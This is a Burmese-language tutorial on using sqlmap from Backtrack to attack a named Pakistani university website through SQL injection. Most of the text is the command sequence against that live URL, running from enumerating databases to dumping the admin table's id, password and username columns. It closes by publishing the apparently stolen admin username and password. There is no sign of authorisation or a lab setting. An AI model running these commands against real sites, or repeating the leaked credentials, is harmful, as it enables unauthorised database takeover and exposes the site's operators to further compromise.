SQL Map ကို Python နဲ ့ develop လုပ္ထားျပီးေတာ့ Backtrack 5, Backtrack 5 R1 အပါအ၀င္ Backtrack Version အားလံုးမွာ ပါ၀င္တဲ့ အေကာင္းဆံုး SQL injection tool တစ္ခုပါ။ သူက database တစ္ခုလံုးကုိ takeover လုပ္လို ့ရတဲ့ powerful tool တစ္ခုလည္းျဖစ္ပါတယ္။



အရင္ဆံုး Vulnerable terget တစ္ခု လိုအပ္ပါတယ္ ။
(က်ေနာ္ကေတာ့ http://www.hu.edu.pk/viewfaculty.php?id=12 ဆိုတဲ့ Pakistan Site တစ္ခုနဲ ့ဥပမာေပးျပီး ရွင္းျပေပးသြားပါမယ္။)



Backtrack terminal ထဲကို သြားျပီးေတာ့  cd/pentest/database/sqlmap လို ့ရိုက္ထည့္လိုက္ပါ။



Sqlmap ကို run ဖို ့အတြက္ သံုးရမယ့္ command ေတြကေတာ့

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

(-u ဆိုတာက vulnerable url)

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

သို ့မဟုတ္

 ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db

တကယ္လို ့ --dbs လို ့အသံုးျပဳရင္ေတာ့ server ထဲမွာ ရွိတဲ့ database အားလံုးကို fetch လုပ္မွာျဖစ္ျပီး
-- current-db ဆိုရင္ေတာ့ current website နဲ ့ related ျဖစ္တဲ့ database ကိုပဲ fetch လုပ္မွာျဖစ္ပါတယ္။ ဒါဆိုရင္ database name ကို ရမွာျဖစ္ပါတယ္။

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results –tables

ဒီမွာ -D ဆိုတာကေတာ့ database name နဲ ့ - tables ဆိုတာကေတာ့ current database ထဲမွာ ရွိတဲ့ tables ေတြကို fetch လုပ္ဖို ့ျဖစ္ျပီးေတာ့ table name ကို ရမွာျဖစ္ပါတယ္။

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

ဒါကေတာ့ table ထဲမွာ ရွိတဲ ့columns name ေတြကို ရယူဖို ့အတြက္ျဖစ္ျပီး

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name –dump

ဒါဆိုရင္ေတာ့ "admin" ဆိုတဲ့ table ထဲမွာရွိတဲ့ information အားလံုးကို ရျပီဆိုရင္ေတာ့ process အားလံုးျပီးျပီဗ်။

Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123